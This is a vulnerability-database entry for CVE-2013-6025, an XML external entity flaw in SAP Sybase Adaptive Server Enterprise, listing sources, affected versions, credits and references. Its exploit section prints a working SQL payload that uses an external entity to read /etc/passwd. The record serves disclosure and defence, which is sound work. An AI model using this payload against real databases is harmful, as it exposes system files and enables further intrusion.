Details of VAR-E-201310-0366

ID

VAR-E-201310-0366

CVE

cve_id:

CVE-2013-6025

Trust: 2.4

sources: BID: 63193 // PACKETSTORM: 134526 // EXPLOIT-DB: 38805 // EDBNET: 60575

EDB ID

38805

TITLE

SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure - Multiple remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38805

DESCRIPTION

SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure. CVE-2013-6025CVE-98655 . remote exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 38805

AFFECTED PRODUCTS

vendor:	sap	model:	sybase adaptive server enterprise	scope:	-	version:	-	Trust: 1.0
vendor:	sap	model:	sybase adapter server enterprise xxe	scope:	-	version:	-	Trust: 0.5

sources: PACKETSTORM: 134526 // EXPLOIT-DB: 38805

EXPLOIT

source: https://www.securityfocus.com/bid/63193/info

SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected.

SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>'))

Trust: 1.0

sources: EXPLOIT-DB: 38805

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38805

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38805

TYPE

XML External Entity Information Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 38805

CREDITS

Igor Bulatenko

Trust: 0.6

sources: EXPLOIT-DB: 38805

EXTERNAL IDS

db:	NVD	id:	CVE-2013-6025	Trust: 2.4
db:	BID	id:	63193	Trust: 1.9
db:	EXPLOIT-DB	id:	38805	Trust: 1.6
db:	EDBNET	id:	60575	Trust: 0.6
db:	PACKETSTORM	id:	134526	Trust: 0.5

sources: BID: 63193 // PACKETSTORM: 134526 // EXPLOIT-DB: 38805 // EDBNET: 60575

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2013-6025	Trust: 2.1
url:	https://www.securityfocus.com/bid/63193/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/38805/	Trust: 0.6

sources: PACKETSTORM: 134526 // EXPLOIT-DB: 38805 // EDBNET: 60575

SOURCES

db:	BID	id:	63193
db:	PACKETSTORM	id:	134526
db:	EXPLOIT-DB	id:	38805
db:	EDBNET	id:	60575

LAST UPDATE DATE

2022-07-27T09:18:52.393000+00:00

SOURCES UPDATE DATE

db:

BID

id:

63193

date:

2013-10-17T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	63193	date:	2013-10-17T00:00:00
db:	PACKETSTORM	id:	134526	date:	2015-11-25T14:52:53
db:	EXPLOIT-DB	id:	38805	date:	2015-11-25T00:00:00
db:	EDBNET	id:	60575	date:	2015-11-25T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE